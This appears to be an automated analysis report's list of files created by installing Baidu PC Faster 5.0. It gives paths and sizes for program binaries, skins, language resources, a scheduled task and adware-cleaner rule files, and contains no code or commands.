%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1170.Alawar_Ask_brch.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\FasterNow\fast_small_circel.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1114.ST-Eng7.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1065.DeltaToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\plugins.xml (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1175.SySaver.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1127.BSPlayerControlBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1099.SearchDeals.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\FasterNow\fast_big_animate.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\oovoo.rul (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\res\res.bskin (6584 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10886.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1117.RewardsArcade.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\small\rainy.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1124.MagicDesktopENToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10067.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\screensnpashot\screensnpashot.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1047.A180Darts.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_homepage\skin_homepage.bskin (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1094.BittorrentBar_DEToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1155.CouponChaser.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1187.Strongvault.rul (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\11452.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1085.facesmooch.rul (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\DataReport.dll (12536 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\nsis_install\nsis_install.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\CP.dll (22192 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1187.Strongvault.rul (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1046.appbario12.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\BaiduSafe\BaiduSafe.bskin (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\SearchAmong.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1167.KingTranslate.rul (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\NewFeatures\NewFeatures.bskin (9320 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1099.SearchDeals.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\PcfTray\PcfTray.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\NEC_on.png (484 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\common\common.bskin (374 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1163.BubbleDock.rul (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1081.Funmoods.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\BBK_off.png (476 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1045.AccuWeather.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\DafaultPC_off.png (376 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1130.PhotoJoyBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Yulong_off.png (582 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1070.IMVUToolbar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\EnumModules.exe (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1111.Vuze.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Alcatel_off.png (453 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\NewFeatures\NewFeatures.bskin (16944 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1168.LessTabs.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\NewFeatures.ini (393 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\nsis_install\nsis_install.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1116.NewVeoh.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\small\sunny.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0005.TornTV.rul (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\InternetHelper.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1165.SavingsScout.rul (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1164.RecordChecker.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\big\foggy.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1196.V9Toolbar.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\FasterNow\fast_small_animate.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1179.FilesFrogUpdateChecker.rul (765 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1108.SmartSuggestor.rul (256 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1166.SpyAlert.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_webclient\skin_webclient.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\url.ini (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\log64.dll (4992 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\11.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1124.MagicDesktopENToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1045.AccuWeather.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1172.AskPartnerNetwork.rul (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1118.A2ZLyrics.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10549.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Deal Spy.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\BugReporter\BugReporter.bskin (971 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1197.Desk365.rul (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\System.dll (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\data\mn.dat (962 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\ieprotect_font\ieprotect_font.bskin (486 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\14.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\TCL_on.png (489 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1072.MyHomepage.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Deals.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\OPPO_off.png (454 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10134.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1095.DigiModeToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\appbario7.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1138.MapsBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\download_circle.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\searchya.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\NewUpdater.exe (15536 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\VidSaver.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1062.OnlineRadioPlayerRecorderToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\NSISInstall.exe (51087 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1077.BrowserCompanion.rul (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\12.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\BugReporter\BugReporter.bskin (980 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\SONY_off.png (586 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Gionee_off.png (562 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Baidu PC Faster\Uninstall.lnk (957 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\CouponCompanion.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\Deals.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFasterSvc.exe (26688 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1130.PhotoJoyBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0017.USBGuardian.rul (418 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\LogReporter.exe (23424 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\big\rainy.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.HomeEx\Plugin_HomeEx.dll (44462 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\PluginHome\rocket.bskin (13368 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\clock_hand.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\snetcfg.exe (4784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\t3.db (470 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\hipspop\hipspop.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1127.BSPlayerControlBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\DataFileVer.xml (303 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1133.Mp3TubeToolbar.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\common\common.bskin (387 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1157.AppsHat.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\HipsPop.exe (11344 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1141.GameMasterToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\85Play_Games.rul (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Baidu PC Faster\Baidu PC Faster.lnk (974 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\SHARP_on.png (591 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\11321.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1153.TubeDimmer.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1089.DVDVideoSoftToolbar.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1170.Alawar_Ask_brch.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFApiUtil64.sys (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\BugReporter\BugReporter.bskin (970 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\sqlite.dll (20416 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\DirectUI.dll (67497 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\SHARP_off.png (532 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Bhbase.sys (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\IWantThis.rul (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1047.A180Darts.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1053.SupremeSavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\SONY_on.png (619 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\MainFrame\splash_light.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1054.CouponCaddy.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10041.png (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1101.VAFMusic.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\sound\clean.wav (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\7.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1176.AutoLyrics.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1113.SpyGuard.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1102.FastFreeConverter.rul (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\map_ID.png (8184 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1139.RecipesBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\lang.ini (94 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10945.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\map_TH.png (8560 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFPopups.exe (68799 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1112.SaveValet.rul (465 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1052.TigerSavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1117.RewardsArcade.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1126.Hao123SearchRemovalTool.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1161.Linksicle.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\bk_uploading.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\big\sunny.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\MixiDJ.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\feedback\feedback.bskin (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\NewFeatures.exe (18424 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\confirm\confirm.bskin (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1087.MediaFinder.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\skin_popup\skin_popup.bskin (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\t1.db (19096 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\sound\update.wav (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\config.ini (13 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\ShoppingSidekick.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\uTorrentBar.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1098.NewYorkYankeesToolbar.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\MixiDJ.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\tools\skin_update\skin_update.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1068.AppBario2.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1188.InfoAtoms.rul (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\string.ini (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1178.IminentToolbar.rul (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\feedback\feedback.bskin (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\SdkConfig.ini (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\OPPO_on.png (453 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1141.GameMasterToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\4.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1065.DeltaToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\MyWebSearch.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1176.AutoLyrics.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1057.TrustWorthy.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1195.WProtectManager.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\RebateInformer.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1057.TrustWorthy.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1060.LuckySavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10192.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\SysOpt\optrec.6.1.def.db (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\apple_on.png (520 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1167.KingTranslate.rul (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1129.HamInfoBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\small\snow.png (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\t2.db (8184 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\NewFeatures\NewFeatures.bskin (9320 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\nsis_install\nsis_install.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\screensnpashot\screensnpashot.bskin (970 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\SonyEric_on.png (673 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1189.JollyWallet.rul (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update_config.xml (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\dbghelp.dll (33877 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1121.KeyBar.rul (784 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Baidu PC Faster\Uninstall.lnk (957 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\BaiduSafe\BaiduSafe.bskin (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0013.FreeKeylogger.rul (237 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\HipsHp.dll (27704 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\tools\FasterNow\FasterNow.bskin (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\Dealio.rul.bak (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Huawei_on.png (697 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1082.PricePeep.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\SysOpt\optrec.6.0.def.db (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\InstallCheck.dll (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10535.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0014.Smadav96.rul (722 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\common\common.bskin (395 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1122.Mysearchdial.rul (12 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BEVMApi001.dll (13368 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1067.SearchAssistant.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\confirm\confirm.bskin (2392 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\CloudOPTClient.exe (32128 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1188.InfoAtoms.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\NetworkSpeedTester\map_BR.png (11344 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1106.GetSavin.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10045.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BigFileCleaner.dat (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1048.MixiDjV30.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1134.ooVoo.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Microsoft_on.png (339 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\log.dll (4992 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1068.AppBario2.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\version.xml (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\DataReport.dll (12536 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10620.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10065.png (3 bytes)
%WinDir%\Tasks\060184C3-9766-46a0-B258-F4518A0B2633.job (918 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1152.DealCola.rul (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\tools\BigFileCleaner\BigFileCleaner.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1158.UnfriendCheck.rul (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0016.AutorunEater.rul (410 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10014.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BHipsConfig.ini (684 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\HomeRank.dat (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\uTorrentControl.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Palm_off.png (446 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\ieprotect_font\ieprotect_font.bskin (486 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\Plugin_OptimizerEx.dll (34023 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\BavPc.dll (16944 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\tools\skin_upgrade\skin_upgrade.bskin (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1087.MediaFinder.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\GiantSavings.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\2.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\feedback\feedback.bskin (5064 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\CleanerEngine.dll (65976 bytes)
